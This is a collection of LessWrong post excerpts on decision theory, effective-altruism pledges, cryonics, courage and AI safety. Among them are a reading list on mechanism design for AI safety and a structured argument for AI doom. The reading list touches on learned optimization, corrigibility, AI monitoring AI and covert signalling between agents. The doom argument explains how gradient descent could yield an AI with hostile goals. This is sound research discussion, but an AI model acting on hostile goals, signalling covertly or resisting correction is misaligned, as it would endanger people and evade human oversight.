Our possible worlds are back to being $\Omega = \{\text{heads}, \text{tails}\}$, with probabilities $P(\text{heads}) = 1/1000$ and $P(\text{tails}) = 999/1000$. We are also back to being able to make a choice in only one particular situation, namely when you're a copy in a green room: $I = \{i_0\}$. Actions are $A_{i_0} = \{(\mathrm{H}), (\mathrm{T})\}$, outcomes $O = \{(+), (-)\}$, utilities $U((+)) = 1$ and $U((-)) = 0$, and the outcome function is given by $o(\text{heads}, \pi_H) = o(\text{tails}, \pi_T) = (+)$ and $o(\text{heads}, \pi_T) = o(\text{tails}, \pi_H) = (-)$. In other words, from SUDT's perspective, this is *exactly identical* to the situation with the counterfactual mugging, and thus the solution is the same: Once more, SUDT recommends choosing (T).
On the other hand, the reason why someone might think that (H) could be the right answer is closer to that for Psy-Kosh's probably counterfactual mugging: After waking up in a green room, what should be your posterior probability that the coin has fallen heads? Updateful anthropic reasoning says that you should be quite sure that it has fallen heads. If you plug those probabilities into an expected utility calculation, it comes out as in Psy-Kosh's case, heavily favoring (H).
But even if these are good probabilities to assign epistemically (to satisfy your curiosity about what the world probably looks like), in light of the arguments from the counterfactual and the probably counterfactual muggings (where updating *definitely* is the right thing to do epistemically, but plugging these probabilities into the expected utility calculation gives the wrong result), it doesn't seem strange to me to come to the conclusion that choosing (T) is correct in Eliezer's anthropic mugging as well. |
e2030c6c-82be-4c7f-b321-9e1a4b53b820 | trentmkelly/LessWrong-43k | LessWrong | Is the 10% Giving What We Can Pledge Core to EA's Reputation?
Introduction
> I don't think the 10% norm forms a major part of EA's public perception, so I don't believe tweaking it would make any difference. - RobertJones
>
> 10% effective donations has brand recognition and is a nice round number, as you point out. -- mhendric
These two comments both received agreement upvotes on my recent post Further defense of the 2% fuzzies/8% EA causes pledge proposal, and although they're differently worded and not irreconcilable, they seem basically to stand in contradiction with each other. Is the 10% Giving What We Can pledge, in which participants commit to donating 10% of their annual income to an effective charity, part of EA's brand or reputation?
Tl;dr
* The Giving What We Can 10% pledge is often featured in prominent coverage of EA
* Broader notions of earning to give, giving specifically to effective charities, and donating a 10%+ fraction of one's income are even more common themes
* Giving What We Can is widely mentioned within EA, sees itself as "one of the shop fronts" for the movement, the pledge itself gets mentioned fairly often, and it's an important driver of EA participation.
* Giving What We Can is a core part of the EA movement and the pledge is core to GWWC.
* Criticism of EA often focuses on specific aspects of the GWWC pledge:
* Can we really draw a line while maintaining intellectual rigor?
* Is 10% the right line to draw?
* Should 100% of what we donate be specifically to what EA deems to be effective charities, or is it OK to also donate to pet causes like the arts?
* More broadly, is EA too focused on its own ideas - a failure of moral cosmopolitanism? Does EA need to incorporate or make some concession to the values of other cultural, moral, or political movements?
This does not resolve the question of how core the specific idea of a 10% pledge of one's income to effective charities is to the EA movement or to its reputation. But the pledge is provocative and the fact that so many EAs |
524cffcf-0603-4f50-8fb7-5b37bd9d3b9f | trentmkelly/LessWrong-43k | LessWrong | Welcome to Less Wrong!, part 2?
Welcome to Less Wrong! has over 1300 comments, but the display only offers 500 newest or 500 oldest, which makes it difficult if anyone wants to look at the whole thing. At a minimum, I recommend a second Welcome! post, but it might also be good to break up the first one (Welcome 1a and 1b, perhaps), and have a policy of a new Welcome post every 700 comments or so. |
6e7195b9-0948-4422-8e7e-76d979e81dda | StampyAI/alignment-research-dataset/eaforum | Effective Altruism Forum | Mechanism Design for AI Safety - Reading Group Curriculum
The Mechanism Design for AI Safety (MDAIS) reading group, announced [here](https://forum.effectivealtruism.org/posts/YmvBu7fuuYEr3hhnh/announcing-mechanism-design-for-ai-safety-reading-group), is currently in its eighth of twelve weeks. I'm very excited by the quality of discussions we've had so far, and by the potential of future work from members of this group. If you're interested in working at the intersection of mechanism design and AI safety, please send me a message so that I can keep you in mind for future opportunities.
Edit: we have completed this initial list and are now meeting on a monthly basis. You can sign up to attend the meetings [here](https://docs.google.com/forms/d/1p-R-WIuTaLabx2RNEXdP2_KdISj_yCPh4H9vX-ZnA3c).
A number of people have reached out to ask me for the reading list we're using. Until now, I've had to tell them that it was still being developed, but at long last it has been finalized. This post is to communicate the list publicly for anyone curious about what we've been discussing, or who would like to follow along themselves. It goes week by week listing the papers covered, the topics of discussion, and any notes I have. After the first two weeks, the order of the papers covered is largely inconsequential.
Reading List
------------
### Week 1
Papers:
1. The Principal-Agent Alignment Problem in Artificial Intelligence by Dylan Hadfield-Menell
2. Incomplete Contracting and AI Alignment by Dylan Hadfield-Menell and Gillian Hadfield
Discussion: Introductions, formalization of the alignment problem, inverse reinforcement learning and cooperative inverse reinforcement learning
Notes: The Principal-Agent Alignment Problem in Artificial Intelligence is extremely long, essentially multiple papers concatenated, so discussing it in the first week gave people more prep time to read it. Incomplete Contracting and AI Alignment is much shorter and less formal but did not add much; in hindsight I would not have included it.
### Week 2
Paper: Risks from Learned Optimization in Advanced Machine Learning Systems by Evan Hubinger, Chris van Merwijk, Vladimir Mikulik, Joar Skalse, and Scott Garrabrant
Discussion: Inner vs. outer alignment, what applications mechanism design has for each "step" in alignment
### Week 3
Paper: Decision Scoring Rules (Extended Version) by Caspar Oesterheld and Vincent Conitzer
Discussion: Oracle AI, making predictions safely
### Week 4
Paper: Discovering Agents by Zachary Kenton, Ramana Kumar, Sebastian Farquhar, Jonathan Richens, Matt MacDermott, and Tom Everitt
Discussion: Defining agents, using causal influence diagrams in AI safety
### Week 5
Papers:
1. Model-Free Opponent Shaping by Chris Lu, Timon Willi, Christian Schroeder de Witt, and Jakob Foerster
2. The Good Shepherd: An Oracle Agent for Mechanism Design by Jan Balaguer, Raphael Koster, Christopher Summerfield, and Andrea Tacchetti
Discussion: Mechanism design affecting learning, how deception might arise
Notes: Almost everything in The Good Shepherd was also covered in Model-Free Opponent Shaping, so in hindsight including it as well was redundant.
### Week 6
Paper: Fully General Online Imitation Learning by Michael Cohen, Marcus Hutter, and Neel Nanda
Discussion: Advantages, disadvantages, and extensions for the mechanism proposed in the paper
### Week 7
Papers:
1. Corrigibility by Nate Soares, Benja Fallenstein, Eliezer Yudkowsky, and Stuart Armstrong
2. The Off-Switch Game by Dylan Hadfield-Menell, Anca Dragan, Pieter Abbeel, and Stuart Russell
Discussion: Formalizing issues with corrigibility, approaches to instill corrigibility
### Week 8
Paper: Investment Incentives in Truthful Approximation Mechanisms by Mohammad Akbarpour, Scott Kominers, Kevin Li, Shengwu Li, and Paul Milgrom
Discussion: Implementing mechanisms with AI, issues with approximation
### Week 9
Paper: Cooperation, Conflict, and Transformative Artificial Intelligence - A Research Agenda by Jesse Clifton
Discussion: Various topics from the agenda with a focus on S-risks and bargaining
### Week 10
Paper: Getting Dynamic Implementation to Work (excluding sections 3 and 4) by Yi-Chun Chen, Richard Holden, Takashi Kunimoto, Yifei Sun, and Tom Wilkening
Discussion: Ensemble models, AI monitoring AI
Notes: Sections 3 and 4 of the paper were excluded as they focus on experimental results with humans, which are of minimal relevance.
### Week 11
Papers:
1. Learning to Communicate with Deep Multi-Agent Reinforcement Learning by Jakob N. Foerster, Yannis M. Assael, Nando de Freitas, and Shimon Whiteson
2. Emergent Covert Signaling in Adversarial Reference Games by Dhara Yu, Jesse Mu, and Noah Goodman
Discussion: Detecting communication, intercepting communication
### Week 12
Paper: Functional Decision Theory: A New Theory of Instrumental Rationality by Eliezer Yudkowsky and Nate Soares
Discussion: Functional decision theory, mechanism design for superrational agents and functional decision theorists
Next Steps
----------
Once we have finished going through this reading list, I would like to move to a more infrequent and irregular schedule. Meetings would be to discuss new developments in the space, the research produced by reading groups members, or topics missed during the first twelve weeks. I expect this ongoing reading group would expand beyond the initial members and be open to anyone interested.
If there is sufficient interest, another iteration going through the above reading list can be run, although likely with several updates.
Finally, we plan to collaborate on an agenda laying out promising research directions at the intersection of mechanism design and AI safety. Ideally, we will have interested members transition to a working group where we can collaborate on research to address the challenge of ensuring AI is a positive development for humanity.
Edit: We have completed the initial readings and are now meeting once a month for further readings. You can sign up to be notified [here](https://docs.google.com/forms/d/1p-R-WIuTaLabx2RNEXdP2_KdISj_yCPh4H9vX-ZnA3c/edit).
Ongoing Readings
----------------
### Meeting 13
Paper: Safe Pareto Improvements for Delegated Game Playing by Caspar Oesterheld and Vince Conitzer
### Meeting 14
Papers:
1. Quantilizers: A Safer Alternative to Maximizers for Limited Optimization by Jessica Taylor
2. Safety Considerations for Online Generative Modeling by Sam Marks
### Meeting 16
Paper: A Robust Bayesian Truth Serum for Small Populations by Jens Witkowski and David C. Parkes
### Meeting 17
Paper: Misspecification in Inverse Reinforcement Learning by Joar Skalse and Alessandro Abate
### Meeting 18
Paper: Hidden Incentives for Auto-Induced Distributional Shift by David Krueger, Tegan Maharaj, and Jan Leike
### Meeting 19
Paper: Evolution of Preferences by Eddie Dekel, Jeffrey Ely, and Okan Yilankaya
### Meeting 20
Paper: A Theory of Rule Development by Glenn Ellison and Richard Holden |
eff3f8b8-4bfa-40d9-b70f-0e60d470ccf2 | trentmkelly/LessWrong-43k | LessWrong | Set image dimensions using markdown
When embedding an image using the markdown editor, is it possible to specify the image dimensions? It seems that both of these do not work:
Inline HTML:
<img src="https://i.imgur.com/25Magmb.png" width="123" height="123">
Some markdown variant I found on stackoverflow:

|
d85ff03b-6ee5-4eae-8fca-119b0b779b4f | trentmkelly/LessWrong-43k | LessWrong | Notes on Courage
This post examines the virtue of courage and explores some practical strategies for becoming more courageous.
Courage (sometimes “bravery” or the closely-related virtue of “valor”) is one of the most frequently mentioned virtues in virtue-oriented traditions. It was one of the four “cardinal virtues” of ancient Greece, for example.
Courage also undergirds other virtues:
> “Courage is not simply one of the virtues but the form of every virtue at the testing point, which means at the point of highest reality.” ―C.S. Lewis[1]
>
> “Courage is the most important of all the virtues because without courage, you can’t practice any other virtue consistently.” ―Maya Angelou[2]
Fear and Our Response to It
Courage has to do with our response to risk and fear. This response has at least three components:
1. The way we judge how threatening a situation is—how easily spooked we are (emotional) and how sensible our risk assessment is (cognitive).
2. How we act when we are immediately confronted with a frightening scenario—how well we think and perform while afraid.
3. How we respond to the risk of being in a fearful scenario at some future time (sometimes “fear” in this anticipatory context is called “anxiety,” “worry,” or “dread”)—whether our risk-aversion is well-honed or whether we are overly risk averse because we “fear fear itself.”
Fear is an unpleasant good in the same sort of way that pain and nausea are: Such things are no fun, but they are useful. Fear (when it is operating properly) informs you that you have put yourself in a situation in which you run the risk of harm. The unpleasantness of the sensation of fear prompts you to be averse to doing it again. Fear also can prepare you for an immediate, protective fight-or-flight response.
(Although we are averse to fear, we sometimes also perversely seek it out. Similar to how some people crave the pain of ghost chilies or spankings, some people crave the fright of horror movies and roller-coasters. Is this perh |
77d50848-bb62-4199-8ab2-41c47a03625a | trentmkelly/LessWrong-43k | LessWrong | Abnormal Cryonics
Written with much help from Nick Tarleton and Kaj Sotala, in response to various themes here, here, and throughout Less Wrong; but a casual mention here1 inspired me to finally write this post. (Note: The first, second, and third footnotes of this post are abnormally important.)
It seems to have become a trend on Less Wrong for people to include belief in the rationality of signing up for cryonics as an obviously correct position2 to take, much the same as thinking the theories of continental drift or anthropogenic global warming are almost certainly correct. I find this mildly disturbing on two counts. First, it really isn't all that obvious that signing up for cryonics is the best use of one's time and money. And second, regardless of whether cryonics turns out to have been the best choice all along, ostracizing those who do not find signing up for cryonics obvious is not at all helpful for people struggling to become more rational. Below I try to provide some decent arguments against signing up for cryonics — not with the aim of showing that signing up for cryonics is wrong, but simply to show that it is not obviously correct, and why it shouldn't be treated as such. (Please note that I am not arguing against the feasibility of cryopreservation!)
Signing up for cryonics is not obviously correct, and especially cannot obviously be expected to have been correct upon due reflection (even if it was the best decision given the uncertainty at the time):
* Weird stuff and ontological confusion: quantum immortality, anthropic reasoning, measure across multiverses, UDTesque 'decision theoretic measure' or 'probability as preference', et cetera, are not well-understood enough to make claims about whether or not you should even care about the number of 'yous' that are living or dying, whatever 'you' think you are.3 This does not make cryonics a bad idea — it may be the correct decision under uncertainty — but it should lessen anyone's confidence that the balance of re |
9737aaad-53f4-429e-81f8-14ee3803a6ce | trentmkelly/LessWrong-43k | LessWrong | Most Minds are Irrational
Epistemic status: This is a step towards formalizing some intuitions about AI. It is closely related to Vanessa Kosoy’s “Descriptive Agent Theory” - but I want to concretize the question, explain the reason that it is true in some form, and try to think through and provide some intuition about why it would matter. I welcome pushback about the claim or the way to operationalize it.
The intuition that most minds are irrational is about the space of possible minds. I have been told that others also haven’t formalized the claim well, and have not found a good explanation. The intuition is that, as a portion of the total possible space, a measure-zero subset of “minds” will fulfill the basic requirements of rational agents. Unfortunately, none of this is really well defined, so I’m writing down my understanding of the problem and what seem like the paths forward. I will note that this isn’t my main focus, and I think it’s important to note that this is only indirectly related to safety, and is far more closely related to deconfusion. However, it seems important when thinking about both artificial intelligence agents, and human minds.
To outline the post, I’ll first prove that in a very narrow case, that almost all possible economic agents are irrational. After that, I’ll talk about why the most general case of any computational process - which includes anything that generates output in response to input, any program or MDP - can be considered a decision process (“what should I output,”) but if all we want is for it to output something, the proportion of agents which are rational is undecidable for technical reasons. I’ll then make a narrower case about chess agents, showing that in a fairly reasonable sense, almost all such agents are irrational. And finally, I’ll talk about what would be needed to make progress on the problems, and some interesting issues or potentially tractable mathematical approaches.
Most economic preferences are irrational
I’ll start with a toy |
280ea5f1-92d0-4554-8d00-bca5b72a5c7f | trentmkelly/LessWrong-43k | LessWrong | AI #11: In Search of a Moat
Remember the start of the week? That’s when everyone was talking about a leaked memo from a Google employee, saying that neither Google nor OpenAI had a moat and the future belonged to open source models. The author was clearly a general advocate for open source in general. If he is right, we live in a highly doomed world.
The good news is that I am unconvinced by the arguments made, and believe we do not live in such a world. We do still live in more of such a world than I thought we did a few months ago, and Meta is very much not helping matters. I continue to think ‘Facebook destroys world’ might be the most embarrassing way to go. Please, not like this.
By post time, that was mostly forgotten. We were off to discussing, among other things, constitutional AI, and Google’s new product announcements, and an avalanche of podcasts.
So it goes.
Also, I got myself a for-the-people write-up in The Telegraph (direct gated link) which I am told did well. Was a great experience to do actual word-by-word editing with the aim of reaching regular people. Start of something big?
TABLE OF CONTENTS
1. Introduction.
2. Table of Contents.
3. Language Models Offer Mundane Utility. Perhaps quite a lot.
4. Level Two Bard. Maybe soon it will be a real boy.
5. Writers Strike, Others Threaten to Strike Back. You might try to replace us. If you do, it will not go well.
6. The Tone Police. You can use AI to make everyone more polite, still won’t help.
7. Fun With Image Generation. MidJourney is killing it, also what you do is public.
8. Introducing. New tools aplenty. GPT-4 winner and still champion.
9. The Art of the SuperPrompt. Should you learn prompt engineering? Yes.
10. They Took Our Jobs. Can we get them to take only the right ones?
11. In Other AI News. There’s always other news.
12. What Would Be a Fire Alarm for Artificial General Intelligence? Some guesses.
13. Robotic Fire Alarms. What would be a fire alarm for robotics in particular?
14. OpenPhil E |
4777df70-26f1-4f1d-ab5f-3478e0457919 | trentmkelly/LessWrong-43k | LessWrong | Quantum Joint Configuration article: need help from physicists
EDIT (1:19 PM PST, 22 December 2010): I completed this post. I didn't realize an uncompleted version was already posted earlier.
I wanted to read the quantum sequence because I've been intrigued by the nature of measurement throughout my physics career. I was happy to see that articles such as joint configuration use beams of photons and half- and fully-silvered mirrors to make their points. I spent years in graduate school working with a two-path interferometer with one moving mirror, which we used to make spectrometric measurements on materials and detectors. I studied the quantization of the electromagnetic field, reading and rereading books such as Yariv's Quantum Electronics and Marcuse's Principles of Quantum Electronics. I developed with my friend David Woody a photodetector theory of extremely sensitive heterodyne mixers which explained the mysterious noise floor of these devices in terms of the shot noise from detecting the stream of photons which are the "Local Oscillator" of that mixer.
My point being that I AM a physicist, and I am even a physicist who has worked with the kinds of configurations shown in this blog post, both experimentally and theoretically. I did all this work 20 years ago and have been away from any kind of Quantum optics stuff for 15 years, but I don't think that is what is holding me back here.
So when I read and reread the joint configuration blog post, I am concerned that it makes absolutely no sense to me. I am hoping that someone out there DOES understand this article and can help me understand it. Someone who understands the more traditional kinds of interferometer configurations such as that described for example here and could help put this joint configuration blog post in terms that relate it to this more usual interferometer situation.
I'd be happy to be referred to this discussion if it has already taken place somewhere. Or I'd be happy to try it in comments to this discussion post. Or I'd be happy to talk t |
0849ed51-d20f-4d7b-b39a-21cf417ca81c | trentmkelly/LessWrong-43k | LessWrong | Meetup : Less Wrong, More Summer, Munich Picnic
Discussion article for the meetup : Less Wrong, More Summer, Munich Picnic
WHEN: 04 June 2016 01:00:00PM (+0200)
WHERE: Tuerkenstr. 29, Muenchen
Location: Cafe Katzentempel, Türkenstr. 29
See Meetup event for updates: http://www.meetup.com/LessWrongMunich/events/231308219/
Discussion article for the meetup : Less Wrong, More Summer, Munich Picnic |
fb6de089-1473-4a4b-a73a-7fb5ff3fd82c | trentmkelly/LessWrong-43k | LessWrong | Meetup : Monday Madison Meetup
Discussion article for the meetup : Monday Madison Meetup
WHEN: 07 May 2012 06:30:00PM (-0500)
WHERE: 1831 Monroe St, Madison, WI
I have a specific topic in mind that I would like to discuss: The illusion of control appears to be both a psychological need and a common, viewpoint-distorting bias. Are there other biases like this? How ought we handle them? Further suggestions for discussion topics are, as always, warmly welcomed.
Also, I'll bring stuff to play The Resistance and Zendo. :D
See you there!
Discussion article for the meetup : Monday Madison Meetup |
005cc192-5430-4fc8-9c99-5ff5f8842ca7 | StampyAI/alignment-research-dataset/lesswrong | LessWrong | Formulating the AI Doom Argument for Analytic Philosophers
Recently, [David Chalmers has asked on Twitter](https://twitter.com/davidchalmers42/status/1647333812584562688?s=20) for a canonical formulation of the AI Doom Argument. After some back and forth with EY, DC came up with a [suggestion](https://twitter.com/davidchalmers42/status/1656493433006043137?s=20) himself.
After reading the conversation I couldn't help but think that EY and DC had partially talked past each other. DC asked a few times for a clarification of the structure of the argument ("I'm still unclear on how it all fits together into an argument", "I see lots of relevant considerations there but no clear central chain of reasoning", etc.). EY then pointed to [lists of relevant](https://twitter.com/ESYudkowsky/status/1655758190817214465?s=20) [considerations](https://twitter.com/ESYudkowsky/status/1656258917813592064?s=20), but not a formulation of the argument in the specific style that analytic philosophers prefer.
This is my attempt at "[providing more structure, like 1-5 points that really matter organized into an argument](https://twitter.com/davidchalmers42/status/1655778244811972609?s=20)":
**The Argument for AI-Doom**
*1.0 The Argument for Alignment Relevancy*
1. Endowing a powerful AI with a UF (utility function) will move the world significantly towards maximizing value according to the AI's UF.
2. If we fail at alignment, then we endow a powerful AI with a UF that is hostile to human values. (Analytic truth?)
3. Therefore: If we fail at alignment, the world will move significantly towards being hostile to human values. (From (1) and (2))
*2.0 The Argument for Alignment Failure as the Default - (The Doom Argument)*
4. Most of all possible UFs are hostile to human values.
5. If most of all possible UFs are hostile to human values, then using an unreliable process to pick one will most likely lead to a UF that is hostile to human values.
6. Therefore: Using an unreliable process to endow an AI with a utility function will most likely endow it with a UF that is hostile to human values. (From (4) and (5))
7. We will be using gradient descent to endow AIs with utility functions.
8. Gradient descent is an unreliable process to endow agents with UFs.
9. Therefore, we will most likely endow AI with a UF that is hostile to human values. (From (6), (7) and (8))
*2.1 An Argument for Hostility (4) - (Captures part of what Bostrom calls Instrumental Convergence)*
10. How much a UF can be satisfied is typically a function of the resources dedicated to pursuing it.
11. Resources are limited.
12. Therefore, there are typically trade-offs between any two distinct UFs. Maximizing one UF will require resources that will prevent other UFs from being pursued.
13. Therefore, most possible UFs are hostile to human values.
*2.2 An Argument for Unreliability (8) - (Argument from analogy?)*
14. Optimization process 1 (natural selection) was unreliable in endowing agents with UFs. Instead of giving us the goal of inclusive genetic fitness (actual goal), it endowed us with various proxy goals.
15. Optimization process 2 (gradient descent) is similar to optimization process 1.
16. Therefore: Optimization process 2 (gradient descent) is an unreliable process to endow agents with UFs.
Some disclaimers:
\*I don't think this style of argument is always superior to the essay style, but it can be helpful because it is short & forces us to structure various ideas and see how they fit together.
\*Not all arguments here are deductively valid.
\*I can think of several additional arguments in support of (4) and (8).
\*I'm looking for ways to improve the arguments, so feel free to suggest concrete formulations.
Thanks to Bob Jones, Beau Madison Mount, and Tobias Zürcher for feedback. |
41079b89-7e6f-4770-aa3c-ccbeb1deca5c | trentmkelly/LessWrong-43k | LessWrong | "Successful language model evals" by Jason Wei
> It’s easier to mess up an eval than to make a good one. Most of the non-successful evals make at least one mistake.
>
> 1. If an eval doesn’t have enough examples, it will be noisy and a bad UI for researchers. ... It’s good to have at least 1,000 examples for your eval; perhaps more if it’s a multiple choice eval. Even though GPQA is a good eval, the fact that it fluctuates based on the prompt makes it hard to use.
> 2. ... If there are a lot of mistakes in your eval, people won’t trust it. For example, I used Natural Questions (NQ) for a long time. But GPT-4 crossed the threshold where if GPT-4 got a test-example incorrect, it was more likely that the ground truth answer provided by the eval was wrong. So I stopped using NQ.
> 3. If your eval is too complicated, it will be hard for people to understand it and it will simply be used less. ... It’s critical to have a single-number metric—I can’t think of any great evals that don’t have a single-number metric.
> 4. If your eval takes too much work to run, it won’t gain traction even if everything else is good. BIG-Bench is one of my favorite evals, but it is a great pain to run. There were both log-prob evals and generation evals, which required different infra ... BIG-Bench didn’t gain much traction, even though it provided a lot of signal.
> 5. If an eval is not on a meaningful task, AI researchers won’t deeply care about it. For example, in BIG-Bench Hard we had tasks like recommending movies or closing parentheses properly ... Successful evals often measure things central to intelligence, like language understanding, exam problems, or math.
> 6. The grading in your eval should be extremely correct. If someone is debugging why their model got graded incorrectly, and they disagree with the grading, that’s a quick way for them to write-off your eval immediately. It’s worth spending the time to minimize errors due to parsing, or to have the best autograder prompt possible.
> 7. For the eval to stand the tes |
a5aa7350-be94-417b-9185-db320330f094 | trentmkelly/LessWrong-43k | LessWrong | Applications of Chaos: Saying No (with Hastings Greer)
Previously Alex Altair and I published a post on the applications of chaos theory, which found a few successes but mostly overhyped dead ends. Luckily the comments came through, providing me with an entirely different type of application: knowing you can’t, and explaining to your boss that you can’t.
Knowing you can’t
Calling a system chaotic rules out many solutions and tools, which can save you time and money in dead ends not traveled. I knew this, but also knew that you could never be 100% certain a physical system was chaotic, as opposed to misunderstood.
However, you can know the equations behind proposed solutions, and trust that reality is unlikely to be simpler[1] than the idealized math. This means that if the equations necessary for your proposed solution could be used to solve the 3-body problem, you don’t have a solution.
[[1] I’m hedging a little because sometimes reality’s complications make the math harder but the ultimate solution easier. E.g. friction makes movement harder to predict but gives you terminal velocity.]
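To make the "error-doublings" concrete, here is a minimal sketch of sensitive dependence on initial conditions. It uses the Lorenz system rather than a double pendulum purely because its equations are compact (that substitution is mine, not anything from the post or podcast); the qualitative behavior is the same:

```python
# Two trajectories of the Lorenz system started 1e-9 apart: the separation
# grows exponentially until it saturates at the size of the attractor, after
# which the two "simulations" agree about nothing. Plain Euler steps.
def step(s, dt=0.01, sigma=10.0, rho=28.0, beta=8.0 / 3.0):
    x, y, z = s
    return (x + dt * sigma * (y - x),
            y + dt * (x * (rho - z) - y),
            z + dt * (x * y - beta * z))

a, b = (1.0, 1.0, 20.0), (1.0 + 1e-9, 1.0, 20.0)
for i in range(3001):
    if i % 600 == 0:
        gap = sum((p - q) ** 2 for p, q in zip(a, b)) ** 0.5
        print(f"t = {i * 0.01:4.0f}  separation = {gap:.1e}")
    a, b = step(a), step(b)
```

Each extra doubling you need to predict through costs another bit of precision in the initial conditions, which is why calling a system chaotic rules out whole families of long-horizon solutions.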
I had a great conversation with trebuchet and math enthusiast Hastings Greer about how this dynamic plays out with trebuchets.
Transcript
Note that this was recorded in Skype with standard headphones, so the recording leaves something to be desired. I think it’s worth it for the trebuchet software visuals starting at 07:00
My favorite parts:
* If a trebuchet requires you to solve the double pendulum problem (a classic example of a chaotic system) in order to aim, it is not a competition-winning trebuchet. ETA 9/22: Hastings corrects this to “If a simulating a trebuchet requires solving the double pendulum problem over many error-doublings, it is not a competition-winning trebuchet”
* Trebuchet design was solved 15-20 years ago; it’s all implementation details now. This did not require modern levels of tech, just modern nerds with free time.
* The winning design was used by the Syrians during Arab Spring, which everyone i |
2829e5f9-c2c4-4dbf-9fd9-084643e57346 | trentmkelly/LessWrong-43k | LessWrong | Why do you (not) use a pseudonym on LessWrong?
Especially as your main account
Edit: I edited the question so that people also feel free to answer the opposite question |
a30c2222-9b29-46c2-815c-bfc0cc5c07a2 | trentmkelly/LessWrong-43k | LessWrong | Are we there yet?
> How good of an idea do the people on this website have in regards to predicting an AGI apocalypse?
I get the impression that a lot of people are very certain that it will happen relatively soon, and I think I've figured out a way to test it. The spreadsheet for the data would look something like this. This questionnaire would be asked each year, and the average percentage for each question would be used.
The interesting thing is that I think I know what it will look like over time
The smallest red box would be your prediction for the first year. It would probably be very low. The largest box (in this case) would be the probability that it happens within 25 years. As time passes and nothing happens, the graph would simply shift left.
What do you think about this approach?
Regards, theflowerpot |
a29d9d45-7c88-41c4-ab5e-7c2d764c9d40 | trentmkelly/LessWrong-43k | LessWrong | Is Redistributive Taxation Justifiable? Part 1: Do the Rich Deserve their Wealth?
The statement “taxation is theft” feels, in the literal sense, at least sort of true. If you do not pay your taxes, after a few strongly worded letters, the IRS (or equivalent government agency) will send armed men to take your money by force and maybe put you in jail for good measure. Nevertheless, it is generally held by most people that taxation is a legitimate object of government; revolts and rebellions over taxation occur not on general principle, but against excessive taxation or taxation without representation. So why do we accept taxation?
This post will not, to be clear, be a general argument against taxation. I am no anarchist; I’m not even a libertarian. Rather, I seek here to explore the moral and practical underpinnings of redistributive taxation. For this purpose, it is worth thinking about in what ways taxation is similar to, or different from, theft, since theft is something of a moral calibrator: most people pretty much agree that it is bad, and even in what ways and for what reasons it is bad.
In this (first) post on the topic, I will be asking whether the rich can be said to ‘deserve’ their wealth. Most of my argumentation will not, I expect, be novel; rather, think of this as a crash course on the standard back-and-forth which has been going on for ages, so that after reading this, we’ll all be able to engage on the topic on a deeper level and with a certain amount of common knowledge.
First, though, I must take you on a brief detour to make it clear what I am not talking about.
Public Goods
The classic, econ 101 solution to the conundrum of ‘why do we accept taxes’ is that taxation is a necessary evil to provide public goods. These are the sort of things that, if individuals are left to act freely, tend not to be produced even though many would want them to be. A standard example is national defense: most people would rather prefer not to be invaded by the nearest dictatorial regime. Most people would also rather prefer not to have to pay |
29c7a129-be59-4c09-aadc-c951b4980769 | trentmkelly/LessWrong-43k | LessWrong | Meetup : First Meetup in Cologne (Köln)
Discussion article for the meetup : First Meetup in Cologne (Köln)
WHEN: 10 November 2013 03:00:00PM (+0100)
WHERE: Starbucks Coffee, An der Hahnepooz 8 50674 Cologne
ETA: The meetup is going to take place on November, 10th, 15:00. I'll be there. In case you don't find the place or something, here's my number: 0157 39606835
As far as I can tell, there never has been a Lesswrong meetup in Cologne. This is a shame, considering that Cologne has over 1 million inhabitants.
I recently moved here from Munich (where I already attended 3 Lesswrong Meetups) to study and would like to meet folks who are also interested in Lesswrong and related topics. Regarding the content and structure of the meetup: I would suggest that at first each of us proposes some discussion topics he or she is interested in (e.g. epistemic rationality, effective altruism, far future/FAI, practical life tips, etc.) and then we choose the most popular ones. And simple socializing and getting to know each other is also great, as far as I'm concerned.
Here is a link to a doodle survey (http://doodle.com/3ms7afrniqxb5i7e), in which you can put your favorite date. I prefer Sundays, but if nobody can attend on Sundays, we can probably change the date.
Please, please leave a comment if you're interested in a LW meetup in Cologne, even if you can't attend one in the next weeks/months.
And remember, (almost) everyone is welcome, especially newbies!
Discussion article for the meetup : First Meetup in Cologne (Köln) |
f2f0a640-d967-4e17-8f6d-321a53af3339 | trentmkelly/LessWrong-43k | LessWrong | San Francisco Meetup every Tues 5/10, 7 pm
Tuesday, May 10th at 7:00 PM
Green Papaya
825 Mission Street (4th and Mission)
San Francisco, CA 94103
Welcome back to the next installment of the newest Bay Area Less Wrong meetup: San Francisco! By popular demand, the third meeting of the San Francisco group will be this coming Tuesday, May 10th, from 7:00-9:00 at Green Papaya near 4th and Mission. The theme of the meeting will be "How do you measure how much fun you're having?" Everyone will get a chance to talk about what they do to try to have fun, how well that usually works out for them, and what they might do to try to improve their odds of having lots of fun.
Hopefully this will help us get to know each other a little bit while also starting to plan out the broad strokes of what kinds of things we'll do together at future meet-ups. Once we know what at least some do for fun (or want to do for fun), we can brainstorm ways of making that happen together.
If you have any questions at all about the Meetup, feel free to call me, [redacted], at [redacted], or to e-mail me at [redacted]. You can also PM me on the Less Wrong blog at Mass_Driver. If you'd like to help organize this or future meetings, you should definitely get in touch -- help is welcome and probably needed!
If you've never been to a LessWrong meetup before, this is a good chance to go to your first one! Chances are other people feel awkward too, and we'll all be a little uneasy about the whole thing together. Less Wrong meetups are so new that nobody really knows the right way to run them yet, let alone the right way to participate in them. So, come! Help us figure it out. It doesn't matter if you've read the whole blog or even if you've graduated high school -- if you show up and try to be less wrong, we'll be glad you came.
If you want to stay informed about upcoming events in the Bay Area, join the Bay Area LessWrong Google Group! There are other chapters in Tortuga and Berkeley, and together we aim to throw so many events that the global Le |
5c75b19a-8c8a-4cc9-9da5-3584c6907896 | trentmkelly/LessWrong-43k | LessWrong | Opinion Article Against Measuring Impact
A strange opinion article in The Guardian today: it is not entirely clear whether the authors object to a concern with effectiveness, or just think that "assessing the short-term impacts of micro-projects" is somehow misguided (and if so, why that is). |
64caa75b-b059-47dd-86ff-c3940c22823e | trentmkelly/LessWrong-43k | LessWrong | The case for Doing Something Else (if Alignment is doomed)
(Related to What an Actually Pessimistic Containment Strategy Looks Like)
It seems to me like there are several approaches with an outside chance of preventing doom from AGI. Here are four:
1. Convince a significant chunk of the field to work on safety rather than capability
2. Solve the technical alignment problem
3. Rethink fundamental ethical assumptions and search for a simple specification of value
4. Establish international cooperation toward Comprehensive AI Services, i.e., build many narrow AI systems instead of something general
Furthermore, these approaches seem quite different, to the point that some have virtually no overlap in a Venn-diagram. #1 is entirely a social problem, #2 a technical and philosophical problem, #3 primarily a philosophical problem, and #4 in equal parts social and technical.
